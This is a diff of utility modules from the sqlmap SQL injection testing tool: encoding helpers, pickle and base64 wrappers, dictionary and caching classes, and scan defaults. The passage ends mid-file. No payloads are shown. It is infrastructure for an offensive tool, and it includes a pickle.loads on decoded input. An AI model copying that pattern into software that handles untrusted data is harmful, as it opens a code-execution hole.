https://github.com/urllib3/urllib3/blob/master/src/urllib3/filepost.py +def choose_boundary(): + """ + >>> len(choose_boundary()) == 32 + True + """ + + retval = "" + + try: + retval = uuid.uuid4().hex + except AttributeError: + retval = "".join(random.sample("0123456789abcdef", 1)[0] for _ in xrange(32)) + + return retval + +# Reference: http://python3porting.com/differences.html +def round(x, d=0): + """ + >>> round(2.0) + 2.0 + >>> round(2.5) + 3.0 + """ + + p = 10 ** d + if x > 0: + return float(math.floor((x * p) + 0.5)) / p + else: + return float(math.ceil((x * p) - 0.5)) / p + +# Reference: https://code.activestate.com/recipes/576653-convert-a-cmp-function-to-a-key-function/ +def cmp_to_key(mycmp): + """Convert a cmp= function into a key= function""" + class K(object): + __slots__ = ['obj'] + + def __init__(self, obj, *args): + self.obj = obj + + def __lt__(self, other): + return mycmp(self.obj, other.obj) < 0 + + def __gt__(self, other): + return mycmp(self.obj, other.obj) > 0 + + def __eq__(self, other): + return mycmp(self.obj, other.obj) == 0 + + def __le__(self, other): + return mycmp(self.obj, other.obj) <= 0 + + def __ge__(self, other): + return mycmp(self.obj, other.obj) >= 0 + + def __ne__(self, other): + return mycmp(self.obj, other.obj) != 0 + + def __hash__(self): + raise TypeError('hash not implemented') + + return K + +# Note: patch for Python 2.6 +if not hasattr(functools, "cmp_to_key"): + functools.cmp_to_key = cmp_to_key + +if sys.version_info >= (3, 0): + xrange = range + buffer = memoryview +else: + xrange = xrange + buffer = buffer + +def LooseVersion(version): + """ + >>> LooseVersion("1.0") == LooseVersion("1.0") + True + >>> LooseVersion("1.0.1") > LooseVersion("1.0") + True + >>> LooseVersion("1.0.1-") == LooseVersion("1.0.1") + True + >>> LooseVersion("1.0.11") < LooseVersion("1.0.111") + True + >>> LooseVersion("foobar") > LooseVersion("1.0") + False + >>> LooseVersion("1.0") > LooseVersion("foobar") + False + >>> LooseVersion("3.22-mysql") == LooseVersion("3.22-mysql-ubuntu0.3") + True + >>> LooseVersion("8.0.22-0ubuntu0.20.04.2") + 8.000022 + """ + + match = re.search(r"\A(\d[\d.]*)", version or "") + + if match: + result = 0 + value = match.group(1) + weight = 1.0 + for part in value.strip('.').split('.'): + if part.isdigit(): + result += int(part) * weight + weight *= 1e-3 + else: + result = float("NaN") + + return result + +# NOTE: codecs.open re-implementation (deprecated in Python 3.14) + +try: + # Py2 + _text_type = unicode + _bytes_types = (str, bytearray) +except NameError: + # Py3 + _text_type = str + _bytes_types = (bytes, bytearray, memoryview) + +_WRITE_CHARS = ("w", "a", "x", "+") + +def _is_write_mode(mode): + return any(ch in mode for ch in _WRITE_CHARS) + +class MixedWriteTextIO(object): + """ + Text-ish stream wrapper that accepts both text and bytes in write(). + Bytes are decoded using the file's (encoding, errors) before writing. + + Optionally approximates line-buffering by flushing when a newline is written. + """ + def __init__(self, fh, encoding, errors, line_buffered=False): + self._fh = fh + self._encoding = encoding + self._errors = errors + self._line_buffered = line_buffered + + def write(self, data): + # bytes-like but not text -> decode + if isinstance(data, _bytes_types) and not isinstance(data, _text_type): + data = bytes(data).decode(self._encoding, self._errors) + elif not isinstance(data, _text_type): + data = _text_type(data) + + n = self._fh.write(data) + + # Approximate "line buffering" behavior if requested + if self._line_buffered and u"\n" in data: + try: + self._fh.flush() + except Exception: + pass + + return n + + def writelines(self, lines): + for x in lines: + self.write(x) + + def __iter__(self): + return iter(self._fh) + + def __next__(self): + return next(self._fh) + + def next(self): # Py2 + return self.__next__() + + def __getattr__(self, name): + return getattr(self._fh, name) + + def __enter__(self): + self._fh.__enter__() + return self + + def __exit__(self, exc_type, exc, tb): + return self._fh.__exit__(exc_type, exc, tb) + + +def _codecs_open(filename, mode="r", encoding=None, errors="strict", buffering=-1): + """ + Replacement for deprecated codecs.open() entry point with sqlmap-friendly behavior. + + - If encoding is None: return io.open(...) as-is. + - If encoding is set: force underlying binary mode and wrap via StreamReaderWriter + (like codecs.open()). + - For write-ish modes: return a wrapper that also accepts bytes on .write(). + - Handles buffering=1 in binary mode by downgrading underlying buffering to -1, + while optionally preserving "flush on newline" behavior in the wrapper. + """ + if encoding is None: + return io.open(filename, mode, buffering=buffering) + + bmode = mode + if "b" not in bmode: + bmode += "b" + + # Avoid line-buffering warnings/errors on binary streams + line_buffered = (buffering == 1) + if line_buffered: + buffering = -1 + + f = io.open(filename, bmode, buffering=buffering) + + try: + info = codecs.lookup(encoding) + srw = codecs.StreamReaderWriter(f, info.streamreader, info.streamwriter, errors) + srw.encoding = encoding + + if _is_write_mode(mode): + return MixedWriteTextIO(srw, encoding, errors, line_buffered=line_buffered) + + return srw + except Exception: + try: + f.close() + finally: + raise + +codecs_open = _codecs_open if sys.version_info >= (3, 14) else codecs.open diff --git a/lib/core/convert.py b/lib/core/convert.py index 28afe17bdba..0b4cddd739e 100644 --- a/lib/core/convert.py +++ b/lib/core/convert.py @@ -1,109 +1,472 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +try: + import cPickle as pickle +except: + import pickle + +import base64 +import binascii +import codecs import json -import pickle +import re import sys +import time +from lib.core.bigarray import BigArray +from lib.core.compat import xrange +from lib.core.data import conf +from lib.core.data import kb +from lib.core.settings import INVALID_UNICODE_PRIVATE_AREA +from lib.core.settings import IS_TTY from lib.core.settings import IS_WIN +from lib.core.settings import NULL +from lib.core.settings import PICKLE_PROTOCOL +from lib.core.settings import SAFE_HEX_MARKER from lib.core.settings import UNICODE_ENCODING +from thirdparty import six +from thirdparty.six import unichr as _unichr +from thirdparty.six.moves import html_parser +from thirdparty.six.moves import collections_abc as _collections -def base64decode(value): - return value.decode("base64") - -def base64encode(value): - return value.encode("base64")[:-1].replace("\n", "") +try: + from html import escape as htmlEscape +except ImportError: + from cgi import escape as htmlEscape def base64pickle(value): + """ + Serializes (with pickle) and encodes to Base64 format supplied (binary) value + + >>> base64unpickle(base64pickle([1, 2, 3])) == [1, 2, 3] + True + """ + retVal = None + try: - retVal = base64encode(pickle.dumps(value, pickle.HIGHEST_PROTOCOL)) + retVal = encodeBase64(pickle.dumps(value, PICKLE_PROTOCOL), binary=False) except: warnMsg = "problem occurred while serializing " warnMsg += "instance of a type '%s'" % type(value) singleTimeWarnMessage(warnMsg) - retVal = base64encode(pickle.dumps(str(value), pickle.HIGHEST_PROTOCOL)) + try: + retVal = encodeBase64(pickle.dumps(value), binary=False) + except: + raise + return retVal def base64unpickle(value): - return pickle.loads(base64decode(value)) + """ + Decodes value from Base64 to plain format and deserializes (with pickle) its content + + >>> type(base64unpickle('gAJjX19idWlsdGluX18Kb2JqZWN0CnEBKYFxAi4=')) == object + True + """ + + retVal = None + + try: + retVal = pickle.loads(decodeBase64(value)) + except TypeError: + retVal = pickle.loads(decodeBase64(bytes(value))) + + return retVal -def hexdecode(value): - value = value.lower() - return (value[2:] if value.startswith("0x") else value).decode("hex") +def htmlUnescape(value): + """ + Returns HTML unescaped value + + >>> htmlUnescape('a<b') == 'a>> htmlUnescape('a<b') == 'a>> htmlUnescape('foobar') == 'foobar' + True + >>> htmlUnescape('foobar') == 'foobar' + True + >>> htmlUnescape('©€') == htmlUnescape('©€') + True + """ + + if value and isinstance(value, six.string_types): + if six.PY3: + import html + return html.unescape(value) + else: + return html_parser.HTMLParser().unescape(value) + return value + +def singleTimeWarnMessage(message): # Cross-referenced function + sys.stdout.write(message) + sys.stdout.write("\n") + sys.stdout.flush() + +def filterNone(values): # Cross-referenced function + return [_ for _ in values if _] if isinstance(values, _collections.Iterable) else values + +def isListLike(value): # Cross-referenced function + return isinstance(value, (list, tuple, set, BigArray)) + +def shellExec(cmd): # Cross-referenced function + raise NotImplementedError -def hexencode(value): - return utf8encode(value).encode("hex") +def jsonize(data): + """ + Returns JSON serialized data -def unicodeencode(value, encoding=None): + >>> jsonize({'foo':'bar'}) + '{\\n "foo": "bar"\\n}' """ - Return 8-bit string representation of the supplied unicode value: - >>> unicodeencode(u'test') - 'test' + return json.dumps(data, sort_keys=False, indent=4) + +def dejsonize(data): + """ + Returns JSON deserialized data + + >>> dejsonize('{\\n "foo": "bar"\\n}') == {u'foo': u'bar'} + True + """ + + return json.loads(data) + +def decodeHex(value, binary=True): + """ + Returns a decoded representation of the provided hexadecimal value + + >>> decodeHex("313233") == b"123" + True + >>> decodeHex("313233", binary=False) == u"123" + True """ retVal = value - if isinstance(value, unicode): - try: - retVal = value.encode(encoding or UNICODE_ENCODING) - except UnicodeEncodeError: - retVal = value.encode(UNICODE_ENCODING, "replace") + + if isinstance(value, six.binary_type): + value = getText(value) + + if value.lower().startswith("0x"): + value = value[2:] + + try: + retVal = codecs.decode(value, "hex") + except LookupError: + retVal = binascii.unhexlify(value) + + if not binary: + retVal = getText(retVal) + return retVal -def utf8encode(value): - return unicodeencode(value, "utf-8") +def encodeHex(value, binary=True): + """ + Returns an encoded representation of the provided value -def utf8decode(value): - return value.decode("utf-8") + >>> encodeHex(b"123") == b"313233" + True + >>> encodeHex("123", binary=False) + '313233' + >>> encodeHex(b"123"[0]) == b"31" + True + >>> encodeHex(123, binary=False) + '7b' + """ -def htmlescape(value): - codes = (('&', '&'), ('<', '<'), ('>', '>'), ('"', '"'), ("'", '''), (' ', ' ')) - return reduce(lambda x, y: x.replace(y[0], y[1]), codes, value) + if isinstance(value, int): + value = six.int2byte(value) + + if isinstance(value, six.text_type): + value = value.encode(UNICODE_ENCODING) + + try: + retVal = codecs.encode(value, "hex") + except LookupError: + retVal = binascii.hexlify(value) + + if not binary: + retVal = getText(retVal) -def htmlunescape(value): - retVal = value - if value and isinstance(value, basestring): - codes = (('<', '<'), ('>', '>'), ('"', '"'), (' ', ' '), ('&', '&')) - retVal = reduce(lambda x, y: x.replace(y[0], y[1]), codes, retVal) return retVal -def singleTimeWarnMessage(message): # Cross-linked function - pass +def decodeBase64(value, binary=True, encoding=None): + """ + Returns a decoded representation of provided Base64 value -def stdoutencode(data): - retVal = None + >>> decodeBase64("MTIz") == b"123" + True + >>> decodeBase64("MTIz", binary=False) + '123' + >>> decodeBase64("A-B_CDE") == decodeBase64("A+B/CDE") + True + >>> decodeBase64(b"MTIzNA") == b"1234" + True + >>> decodeBase64("MTIzNA") == b"1234" + True + >>> decodeBase64("MTIzNA==") == b"1234" + True + """ + + if value is None: + return None + + padding = b'=' if isinstance(value, bytes) else '=' + + # Reference: https://stackoverflow.com/a/49459036 + if not value.endswith(padding): + value += 3 * padding + + # Reference: https://en.wikipedia.org/wiki/Base64#URL_applications + # Reference: https://perldoc.perl.org/MIME/Base64.html + if isinstance(value, bytes): + value = value.replace(b'-', b'+').replace(b'_', b'/') + else: + value = value.replace('-', '+').replace('_', '/') + + retVal = base64.b64decode(value) + + if not binary: + retVal = getText(retVal, encoding) + + return retVal + +def encodeBase64(value, binary=True, encoding=None, padding=True, safe=False): + """ + Returns a Base64 encoded representation of the provided value + + >>> encodeBase64(b"123") == b"MTIz" + True + >>> encodeBase64(u"1234", binary=False) + 'MTIzNA==' + >>> encodeBase64(u"1234", binary=False, padding=False) + 'MTIzNA' + >>> encodeBase64(decodeBase64("A-B_CDE"), binary=False, safe=True) + 'A-B_CDE' + """ + + if value is None: + return None + + if isinstance(value, six.text_type): + value = value.encode(encoding or UNICODE_ENCODING) + + retVal = base64.b64encode(value) + + if not binary: + retVal = getText(retVal, encoding) + + if safe: + padding = False + + # Reference: https://en.wikipedia.org/wiki/Base64#URL_applications + # Reference: https://perldoc.perl.org/MIME/Base64.html + if isinstance(retVal, bytes): + retVal = retVal.replace(b'+', b'-').replace(b'/', b'_') + else: + retVal = retVal.replace('+', '-').replace('/', '_') + + if not padding: + retVal = retVal.rstrip(b'=' if isinstance(retVal, bytes) else '=') + + return retVal + +def getBytes(value, encoding=None, errors="strict", unsafe=True): + """ + Returns byte representation of provided Unicode value + + >>> getBytes(u"foo\\\\x01\\\\x83\\\\xffbar") == b"foo\\x01\\x83\\xffbar" + True + """ + + retVal = value + + if encoding is None: + encoding = conf.get("encoding") or UNICODE_ENCODING try: - # Reference: http://bugs.python.org/issue1602 - if IS_WIN: - output = data.encode('ascii', "replace") - - if output != data: - warnMsg = "cannot properly display Unicode characters " - warnMsg += "inside Windows OS command prompt " - warnMsg += "(http://bugs.python.org/issue1602). All " - warnMsg += "unhandled occurances will result in " - warnMsg += "replacement with '?' character. Please, find " - warnMsg += "proper character representation inside " - warnMsg += "corresponding output files. " - singleTimeWarnMessage(warnMsg) - - retVal = output + codecs.lookup(encoding) + except (LookupError, TypeError): + encoding = UNICODE_ENCODING + + if isinstance(value, bytearray): + return bytes(value) + elif isinstance(value, memoryview): + return value.tobytes() + elif isinstance(value, six.text_type): + if INVALID_UNICODE_PRIVATE_AREA: + if unsafe: + for char in xrange(0xF0000, 0xF00FF + 1): + value = value.replace(_unichr(char), "%s%02x" % (SAFE_HEX_MARKER, char - 0xF0000)) + + retVal = value.encode(encoding, errors) + + if unsafe: + retVal = re.sub((r"%s([0-9a-f]{2})" % SAFE_HEX_MARKER).encode(), lambda _: decodeHex(_.group(1)), retVal) else: - retVal = data.encode(sys.stdout.encoding) - except: - retVal = data.encode(UNICODE_ENCODING) + try: + retVal = value.encode(encoding, errors) + except UnicodeError: + retVal = value.encode(UNICODE_ENCODING, errors="replace") + + if unsafe: + retVal = re.sub(b"\\\\x([0-9a-f]{2})", lambda _: decodeHex(_.group(1)), retVal) return retVal -def jsonize(data): - return json.dumps(data, sort_keys=False, indent=4) +def getOrds(value): + """ + Returns ORD(...) representation of provided string value -def dejsonize(data): - return json.loads(data) + >>> getOrds(u'fo\\xf6bar') + [102, 111, 246, 98, 97, 114] + >>> getOrds(b"fo\\xc3\\xb6bar") + [102, 111, 195, 182, 98, 97, 114] + """ + + return [_ if isinstance(_, int) else ord(_) for _ in value] + +def getUnicode(value, encoding=None, noneToNull=False): + """ + Returns the unicode representation of the supplied value + + >>> getUnicode('test') == u'test' + True + >>> getUnicode(1) == u'1' + True + >>> getUnicode(None) == 'None' + True + >>> getUnicode(b'/etc/passwd') == '/etc/passwd' + True + """ + + # Best position for --time-limit mechanism + if conf.get("timeLimit") and kb.get("startTime") and (time.time() - kb.startTime > conf.timeLimit): + raise SystemExit + + if noneToNull and value is None: + return NULL + + if isinstance(value, six.text_type): + return value + elif isinstance(value, six.binary_type): + # Heuristics (if encoding not explicitly specified) + candidates = filterNone((encoding, kb.get("pageEncoding") if kb.get("originalPage") else None, conf.get("encoding"), UNICODE_ENCODING, sys.getfilesystemencoding())) + if all(_ in value for _ in (b'<', b'>')): + pass + elif b'\n' not in value and re.search(r"(?i)\w+\.\w{2,3}\Z|\A(\w:\\|/\w+)", six.text_type(value, UNICODE_ENCODING, errors="ignore")): + candidates = filterNone((encoding, sys.getfilesystemencoding(), kb.get("pageEncoding") if kb.get("originalPage") else None, UNICODE_ENCODING, conf.get("encoding"))) + elif conf.get("encoding") and b'\n' not in value: + candidates = filterNone((encoding, conf.get("encoding"), kb.get("pageEncoding") if kb.get("originalPage") else None, sys.getfilesystemencoding(), UNICODE_ENCODING)) + + for candidate in candidates: + try: + return six.text_type(value, candidate) + except (UnicodeDecodeError, LookupError): + pass + + try: + return six.text_type(value, encoding or (kb.get("pageEncoding") if kb.get("originalPage") else None) or UNICODE_ENCODING) + except UnicodeDecodeError: + return six.text_type(value, UNICODE_ENCODING, errors="reversible") + elif isListLike(value): + value = list(getUnicode(_, encoding, noneToNull) for _ in value) + return value + else: + try: + return six.text_type(value) + except UnicodeDecodeError: + return six.text_type(str(value), errors="ignore") # encoding ignored for non-basestring instances + +def getText(value, encoding=None): + """ + Returns textual value of a given value (Note: not necessary Unicode on Python2) + + >>> getText(b"foobar") + 'foobar' + >>> isinstance(getText(u"fo\\u2299bar"), six.text_type) + True + """ + + retVal = value + + if isinstance(value, six.binary_type): + retVal = getUnicode(value, encoding) + + if six.PY2: + try: + retVal = str(retVal) + except: + pass + + return retVal + +def stdoutEncode(value): + """ + Returns textual representation of a given value safe for writing to stdout + >>> stdoutEncode(b"foobar") + 'foobar' + """ + + if value is None: + value = "" + + if IS_WIN and IS_TTY and kb.get("codePage", -1) is None: + output = shellExec("chcp") + match = re.search(r": (\d{3,})", output or "") + + if match: + try: + candidate = "cp%s" % match.group(1) + codecs.lookup(candidate) + kb.codePage = candidate + except (LookupError, TypeError): + pass + + kb.codePage = kb.codePage or "" + + encoding = kb.get("codePage") or getattr(sys.stdout, "encoding", None) or UNICODE_ENCODING + + if six.PY3: + if isinstance(value, (bytes, bytearray)): + value = getUnicode(value, encoding) + elif not isinstance(value, str): + value = str(value) + + try: + retVal = value.encode(encoding, errors="replace").decode(encoding, errors="replace") + except (LookupError, TypeError): + retVal = value.encode("ascii", errors="replace").decode("ascii", errors="replace") + else: + if isinstance(value, six.text_type): + try: + retVal = value.encode(encoding, errors="replace") + except (LookupError, TypeError): + retVal = value.encode("ascii", errors="replace") + else: + retVal = value + + return retVal + +def getConsoleLength(value): + """ + Returns console width of unicode values + + >>> getConsoleLength("abc") + 3 + >>> getConsoleLength(u"\\u957f\\u6c5f") + 4 + """ + + if isinstance(value, six.text_type): + retVal = len(value) + sum(ord(_) >= 0x3000 for _ in value) + else: + retVal = len(value) + + return retVal diff --git a/lib/core/data.py b/lib/core/data.py index dcc3fc020fe..5523a60c49a 100644 --- a/lib/core/data.py +++ b/lib/core/data.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.datatype import AttribDict @@ -14,6 +14,9 @@ # object to store original command line options cmdLineOptions = AttribDict() +# object to store merged options (command line, configuration file and default options) +mergedOptions = AttribDict() + # object to share within function and classes command # line options and settings conf = AttribDict() diff --git a/lib/core/datatype.py b/lib/core/datatype.py index b5f4176a686..b0b1809f8a8 100644 --- a/lib/core/datatype.py +++ b/lib/core/datatype.py @@ -1,33 +1,37 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import copy +import threading import types -from lib.core.exception import SqlmapDataException +from thirdparty.odict import OrderedDict +from thirdparty.six.moves import collections_abc as _collections class AttribDict(dict): """ - This class defines the sqlmap object, inheriting from Python data - type dictionary. + This class defines the dictionary with added capability to access members as attributes + + >>> foo = AttribDict() + >>> foo.bar = 1 + >>> foo.bar + 1 + >>> import copy; copy.deepcopy(foo).bar + 1 """ - def __init__(self, indict=None, attribute=None): + def __init__(self, indict=None, attribute=None, keycheck=True): if indict is None: indict = {} - # Set any attributes here - before initialisation - # these remain as normal attributes - self.attribute = attribute dict.__init__(self, indict) - self.__initialised = True - - # After initialisation, setting attributes - # is the same as setting an item + self.__dict__["_attribute"] = attribute + self.__dict__["_keycheck"] = keycheck + self.__dict__["_initialized"] = True def __getattr__(self, item): """ @@ -38,7 +42,23 @@ def __getattr__(self, item): try: return self.__getitem__(item) except KeyError: - raise SqlmapDataException("unable to access item '%s'" % item) + if self.__dict__.get("_keycheck"): + raise AttributeError("unable to access item '%s'" % item) + else: + return None + + def __delattr__(self, item): + """ + Deletes attributes + """ + + try: + return self.pop(item) + except KeyError: + if self.__dict__.get("_keycheck"): + raise AttributeError("unable to access item '%s'" % item) + else: + return None def __setattr__(self, item, value): """ @@ -46,14 +66,8 @@ def __setattr__(self, item, value): Only if we are initialised """ - # This test allows attributes to be set in the __init__ method - if "_AttribDict__initialised" not in self.__dict__: - return dict.__setattr__(self, item, value) - - # Any normal attributes are handled normally - elif item in self.__dict__: - dict.__setattr__(self, item, value) - + if "_initialized" not in self.__dict__ or item in self.__dict__: + self.__dict__[item] = value else: self.__setitem__(item, value) @@ -64,14 +78,12 @@ def __setstate__(self, dict): self.__dict__ = dict def __deepcopy__(self, memo): - retVal = self.__class__() + retVal = self.__class__(keycheck=self.__dict__.get("_keycheck")) memo[id(self)] = retVal - for attr in dir(self): - if not attr.startswith('_'): - value = getattr(self, attr) - if not isinstance(value, (types.BuiltinFunctionType, types.BuiltinFunctionType, types.FunctionType, types.MethodType)): - setattr(retVal, attr, copy.deepcopy(value, memo)) + for attr, value in self.__dict__.items(): + if attr not in ('_attribute', '_keycheck', '_initialized'): + setattr(retVal, attr, copy.deepcopy(value, memo)) for key, value in self.items(): retVal.__setitem__(key, copy.deepcopy(value, memo)) @@ -79,8 +91,8 @@ def __deepcopy__(self, memo): return retVal class InjectionDict(AttribDict): - def __init__(self): - AttribDict.__init__(self) + def __init__(self, **kwargs): + AttribDict.__init__(self, **kwargs) self.place = None self.parameter = None @@ -88,6 +100,7 @@ def __init__(self): self.prefix = None self.suffix = None self.clause = None + self.notes = [] # Note: https://github.com/sqlmapproject/sqlmap/issues/1888 # data is a dict with various stype, each which is a dict with # all the information specific for that stype @@ -100,3 +113,129 @@ def __init__(self): self.dbms = None self.dbms_version = None self.os = None + +# Reference: https://www.kunxi.org/2014/05/lru-cache-in-python +class LRUDict(object): + """ + This class defines the LRU dictionary + + >>> foo = LRUDict(capacity=2) + >>> foo["first"] = 1 + >>> foo["second"] = 2 + >>> foo["third"] = 3 + >>> "first" in foo + False + >>> "third" in foo + True + """ + + def __init__(self, capacity): + self.capacity = capacity + self.cache = OrderedDict() + self.__lock = threading.Lock() + + def __len__(self): + return len(self.cache) + + def __contains__(self, key): + return key in self.cache + + def __getitem__(self, key): + with self.__lock: + value = self.cache.pop(key) + self.cache[key] = value + return value + + def get(self, key, default=None): + try: + return self.__getitem__(key) + except: + return default + + def __setitem__(self, key, value): + with self.__lock: + try: + self.cache.pop(key) + except KeyError: + if len(self.cache) >= self.capacity: + self.cache.popitem(last=False) + self.cache[key] = value + + def set(self, key, value): + self.__setitem__(key, value) + + def keys(self): + return self.cache.keys() + +# Reference: https://code.activestate.com/recipes/576694/ +class OrderedSet(_collections.MutableSet): + """ + This class defines the set with ordered (as added) items + + >>> foo = OrderedSet() + >>> foo.add(1) + >>> foo.add(2) + >>> foo.add(3) + >>> foo.pop() + 3 + >>> foo.pop() + 2 + >>> foo.pop() + 1 + """ + + def __init__(self, iterable=None): + self.end = end = [] + end += [None, end, end] # sentinel node for doubly linked list + self.map = {} # key --> [key, prev, next] + if iterable is not None: + self |= iterable + + def __len__(self): + return len(self.map) + + def __contains__(self, key): + return key in self.map + + def add(self, value): + if value not in self.map: + end = self.end + curr = end[1] + curr[2] = end[1] = self.map[value] = [value, curr, end] + + def discard(self, value): + if value in self.map: + value, prev, next = self.map.pop(value) + prev[2] = next + next[1] = prev + + def __iter__(self): + end = self.end + curr = end[2] + while curr is not end: + yield curr[0] + curr = curr[2] + + def __reversed__(self): + end = self.end + curr = end[1] + while curr is not end: + yield curr[0] + curr = curr[1] + + def pop(self, last=True): + if not self: + raise KeyError('set is empty') + key = self.end[1][0] if last else self.end[2][0] + self.discard(key) + return key + + def __repr__(self): + if not self: + return '%s()' % (self.__class__.__name__,) + return '%s(%r)' % (self.__class__.__name__, list(self)) + + def __eq__(self, other): + if isinstance(other, OrderedSet): + return len(self) == len(other) and list(self) == list(other) + return set(self) == set(other) diff --git a/lib/core/decorators.py b/lib/core/decorators.py index fbc19c92a1f..53603e81637 100644 --- a/lib/core/decorators.py +++ b/lib/core/decorators.py @@ -1,19 +1,128 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -def cachedmethod(f, cache={}): +import functools +import threading + +from lib.core.datatype import LRUDict +from lib.core.settings import MAX_CACHE_ITEMS +from lib.core.threads import getCurrentThreadData + +_cache = {} +_method_locks = {} + +def cachedmethod(f): """ Method with a cached content + >>> __ = cachedmethod(lambda _: _) + >>> __(1) + 1 + >>> __(1) + 1 + >>> __ = cachedmethod(lambda *args, **kwargs: args[0]) + >>> __(2) + 2 + >>> __ = cachedmethod(lambda *args, **kwargs: next(iter(kwargs.values()))) + >>> __(foobar=3) + 3 + Reference: http://code.activestate.com/recipes/325205-cache-decorator-in-python-24/ """ + + _cache[f] = LRUDict(capacity=MAX_CACHE_ITEMS) + _method_locks[f] = threading.RLock() + + def _freeze(val): + if isinstance(val, (list, set, tuple)): + return tuple(_freeze(x) for x in val) + if isinstance(val, dict): + return tuple(sorted((k, _freeze(v)) for k, v in val.items())) + return val + + @functools.wraps(f) + def _f(*args, **kwargs): + lock, cache = _method_locks[f], _cache[f] + + try: + if kwargs: + key = (args, frozenset(kwargs.items())) + else: + key = args + + with lock: + if key in cache: + return cache[key] + + except TypeError: + # Note: fallback (slowpath( + if kwargs: + key = (_freeze(args), _freeze(kwargs)) + else: + key = _freeze(args) + + with lock: + if key in cache: + return cache[key] + + result = f(*args, **kwargs) + + with lock: + cache[key] = result + + return result + + return _f + +def stackedmethod(f): + """ + Method using pushValue/popValue functions (fallback function for stack realignment) + + >>> threadData = getCurrentThreadData() + >>> original = len(threadData.valueStack) + >>> __ = stackedmethod(lambda _: threadData.valueStack.append(_)) + >>> __(1) + >>> len(threadData.valueStack) == original + True + """ + + @functools.wraps(f) + def _(*args, **kwargs): + threadData = getCurrentThreadData() + originalLevel = len(threadData.valueStack) + + try: + result = f(*args, **kwargs) + finally: + if len(threadData.valueStack) > originalLevel: + del threadData.valueStack[originalLevel:] + + return result + + return _ + +def lockedmethod(f): + """ + Decorates a function or method with a reentrant lock (only one thread can execute the function at a time) + + >>> @lockedmethod + ... def recursive_count(n): + ... if n <= 0: return 0 + ... return n + recursive_count(n - 1) + >>> recursive_count(5) + 15 + """ + + lock = threading.RLock() + + @functools.wraps(f) def _(*args, **kwargs): - key = (f, tuple(args), frozenset(kwargs.items())) - if key not in cache: - cache[key] = f(*args, **kwargs) - return cache[key] + with lock: + result = f(*args, **kwargs) + return result + return _ diff --git a/lib/core/defaults.py b/lib/core/defaults.py index 17d18c0ef49..743ab6a26b9 100644 --- a/lib/core/defaults.py +++ b/lib/core/defaults.py @@ -1,28 +1,29 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.datatype import AttribDict _defaults = { - "csvDel": ",", - "timeSec": 5, - "googlePage": 1, - "cpuThrottle": 5, - "verbose": 1, - "delay": 0, - "timeout": 30, - "retries": 3, - "saFreq": 0, - "threads": 1, - "level": 1, - "risk": 1, - "dumpFormat": "CSV", - "tech": "BEUSTQ", - "torType": "HTTP", + "csvDel": ',', + "timeSec": 5, + "googlePage": 1, + "verbose": 1, + "delay": 0, + "timeout": 30, + "retries": 3, + "csrfRetries": 0, + "safeFreq": 0, + "threads": 1, + "level": 1, + "risk": 1, + "dumpFormat": "CSV", + "tablePrefix": "sqlmap", + "technique": "BEUSTQ", + "torType": "SOCKS5", } defaults = AttribDict(_defaults) diff --git a/lib/core/dicts.py b/lib/core/dicts.py index 4901d016edc..a1baf0db3a2 100644 --- a/lib/core/dicts.py +++ b/lib/core/dicts.py @@ -1,213 +1,691 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from lib.core.enums import CONTENT_TYPE from lib.core.enums import DBMS +from lib.core.enums import OS from lib.core.enums import POST_HINT +from lib.core.settings import ACCESS_ALIASES +from lib.core.settings import ALTIBASE_ALIASES from lib.core.settings import BLANK -from lib.core.settings import NULL +from lib.core.settings import CACHE_ALIASES +from lib.core.settings import CRATEDB_ALIASES +from lib.core.settings import CUBRID_ALIASES +from lib.core.settings import DB2_ALIASES +from lib.core.settings import DERBY_ALIASES +from lib.core.settings import EXTREMEDB_ALIASES +from lib.core.settings import FIREBIRD_ALIASES +from lib.core.settings import FRONTBASE_ALIASES +from lib.core.settings import H2_ALIASES +from lib.core.settings import HSQLDB_ALIASES +from lib.core.settings import INFORMIX_ALIASES +from lib.core.settings import MAXDB_ALIASES +from lib.core.settings import MCKOI_ALIASES +from lib.core.settings import MIMERSQL_ALIASES +from lib.core.settings import MONETDB_ALIASES from lib.core.settings import MSSQL_ALIASES from lib.core.settings import MYSQL_ALIASES -from lib.core.settings import PGSQL_ALIASES +from lib.core.settings import NULL from lib.core.settings import ORACLE_ALIASES +from lib.core.settings import PGSQL_ALIASES +from lib.core.settings import PRESTO_ALIASES +from lib.core.settings import RAIMA_ALIASES from lib.core.settings import SQLITE_ALIASES -from lib.core.settings import ACCESS_ALIASES -from lib.core.settings import FIREBIRD_ALIASES -from lib.core.settings import MAXDB_ALIASES from lib.core.settings import SYBASE_ALIASES -from lib.core.settings import DB2_ALIASES +from lib.core.settings import VERTICA_ALIASES +from lib.core.settings import VIRTUOSO_ALIASES +from lib.core.settings import CLICKHOUSE_ALIASES +from lib.core.settings import SNOWFLAKE_ALIASES FIREBIRD_TYPES = { - "261": "BLOB", - "14": "CHAR", - "40": "CSTRING", - "11": "D_FLOAT", - "27": "DOUBLE", - "10": "FLOAT", - "16": "INT64", - "8": "INTEGER", - "9": "QUAD", - "7": "SMALLINT", - "12": "DATE", - "13": "TIME", - "35": "TIMESTAMP", - "37": "VARCHAR", - } + 261: "BLOB", + 14: "CHAR", + 40: "CSTRING", + 11: "D_FLOAT", 